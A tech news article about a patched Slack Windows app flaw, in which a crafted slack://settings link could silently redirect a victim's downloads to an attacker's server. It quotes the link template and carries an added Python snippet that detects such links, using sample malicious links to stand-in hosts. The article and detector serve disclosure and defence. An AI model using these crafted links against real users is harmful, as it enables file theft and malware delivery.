Slack fixes a bug in the Windows app that could have been used for spying


A security researcher discovered a flaw in Slack's Windows desktop app that could have been exploited to steal files downloaded through the workplace messaging app and potentially to spread malware.

The flaw concerns the Slack desktop app for Windows and how it saves downloaded files to a configured destination, which can be a folder on your PC or a network file server. You can set the download location in the app's preferences. However, David Wells, a researcher at security firm Tenable, noticed that there is another way to change that setting: through a specially crafted link.

“Creating a link like slack://settings/?update={'PrefSSBFileDownloadPath':'[pathHere]'} would change the default download location if clicked,” Wells wrote in a blog post about the vulnerability.

Wells realized that the same function could be abused. Imagine an attacker using such a link to silently reconfigure a victim's Slack desktop app so that every file the victim downloads is written to a server the attacker controls. “Using this attack vector, an insider could exploit this vulnerability for corporate espionage, manipulation or to access documents outside of their purview,” Tenable, Wells' employer, said in a separate report.

The vulnerability could also pave the way for malware infections. Any file downloaded to the attacker-controlled server could be modified to include malicious code, and the tampered copy is what the victim would get when opening the file from the Slack desktop app, at which point the attack would trigger.
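As an added illustration (not code from the article, from Tenable's blog post, or from Slack), the following Python snippet parses links of the form quoted above and flags any that would point the download location at a remote server, the kind of check a feed filter or mail gateway could run. Only the slack://settings/?update= shape and the PrefSSBFileDownloadPath key come from the article; how the path is quoted and escaped inside the update parameter, the assumption that a remote destination would appear as a UNC path (\\server\share), and the sample links are this example's own assumptions.

```python
import json
import re
from urllib.parse import urlsplit, unquote

# Preference key quoted in the article. Treating a UNC path (\\server\share, or
# the //server/share spelling) as "remote" is this example's own heuristic.
DOWNLOAD_PATH_KEY = "PrefSSBFileDownloadPath"
UNC_RE = re.compile(r"^(\\\\|//)[^\\/]+[\\/]")


def parse_update(link):
    """Return the settings dict carried by a slack://settings/?update=... link,
    or None if the link is not a settings-update link."""
    parts = urlsplit(link)
    if parts.scheme != "slack" or parts.netloc != "settings":
        return None
    for param in parts.query.split("&"):
        key, _, value = param.partition("=")
        if key != "update":
            continue
        raw = unquote(value)
        try:
            return json.loads(raw)
        except ValueError:
            # The link quoted in the article uses single quotes, which strict
            # JSON rejects; accept that spelling too (assumed, not documented).
            try:
                return json.loads(raw.replace("'", '"'))
            except ValueError:
                return None
    return None


def classify_link(link):
    """'remote-download-path' if the link would redirect downloads to a network
    location, 'local-download-path' if it only changes a local folder, None if
    it does not touch the download path at all."""
    update = parse_update(link)
    if not isinstance(update, dict) or DOWNLOAD_PATH_KEY not in update:
        return None
    path = str(update[DOWNLOAD_PATH_KEY])
    return "remote-download-path" if UNC_RE.match(path) else "local-download-path"


def flag_remote_redirects(links):
    """Return the subset of links that would redirect downloads off-host."""
    return [link for link in links if classify_link(link) == "remote-download-path"]


# Constructed sample links for this example (not from the article).
SAMPLE_LINKS = [
    # benign: changes the download folder to a local path
    r"slack://settings/?update={'PrefSSBFileDownloadPath':'C:\\Users\\alice\\Downloads'}",
    # malicious: points downloads at an SMB share on a documentation (test-net) address
    r"slack://settings/?update={'PrefSSBFileDownloadPath':'\\\\203.0.113.7\\share'}",
    # the same idea, percent-encoded as it might appear in a feed item
    "slack://settings/?update=%7B%27PrefSSBFileDownloadPath%27%3A%27%5C%5C%5C%5Cfiles.example.net%5C%5Cdrop%27%7D",
    # an unrelated deep link that does not touch settings
    "slack://open?team=T0000",
]

if __name__ == "__main__":
    for link in SAMPLE_LINKS:
        print(classify_link(link), link)
```

Run stand-alone it classifies the four constructed links; in practice you would feed it every slack:// link extracted from RSS items before they reach a channel, and treat a remote-download-path hit as something to block or review.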

The main obstacle to carrying out this attack is getting attacker-crafted links in front of Slack users, since channels are private to each paying customer's organization. To get around this, Wells noticed that Slack channels can be configured to subscribe to RSS feeds, including feeds of discussion threads on Reddit.

“I could post an article to a very popular Reddit community that Slack users around the world subscribe to,” Wells said. The attacker's link would then show up in every Slack channel subscribed to that feed and eventually attract a few clicks.


“This technique might be unmasked by savvy Slack users, but if decades of phishing campaigns have taught us anything, it's that users click on links, and when they are exploited via an untrusted RSS feed, the impact can become much more interesting,” he added.

Slack fixed the flaw in version 3.4.0 of the Windows desktop app. “We have investigated and found no indication that this vulnerability has ever been used, nor any report that our users have been affected,” the company said in an email.
